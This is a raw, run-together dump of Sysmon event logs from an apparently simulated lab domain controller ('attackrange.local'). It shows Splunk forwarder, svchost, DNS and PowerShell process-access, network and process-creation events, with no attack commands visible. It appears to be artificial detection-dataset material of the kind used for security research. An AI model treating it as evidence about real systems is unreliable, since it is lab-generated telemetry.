Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.942{266CAFBE-647C-6064-2B00-00000000AE01}2536WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.942{266CAFBE-647C-6064-2B00-00000000AE01}2536WIN-DC-892010.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.702{266CAFBE-647C-6064-2B00-00000000AE01}2536WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 354300x80000000000000002945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.748{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49697-false10.0.1.12-9997- 354300x80000000000000002944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.871{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54254- 23542300x80000000000000002943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.112{266CAFBE-6484-6064-7200-00000000AE01}4296NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.408{266CAFBE-6486-6064-7400-00000000AE01}44604464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6486-6064-7400-00000000AE01}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6486-6064-7400-00000000AE01}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.236{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6486-6064-7400-00000000AE01}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.021{266CAFBE-6486-6064-7400-00000000AE01}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.743{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.64-53860-false10.0.1.14win-dc-892.attackrange.local5986- 354300x80000000000000002962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.871{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54254- 354300x80000000000000002994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.887{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54223- 10341000x80000000000000002993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.127{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6486-6064-7500-00000000AE01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 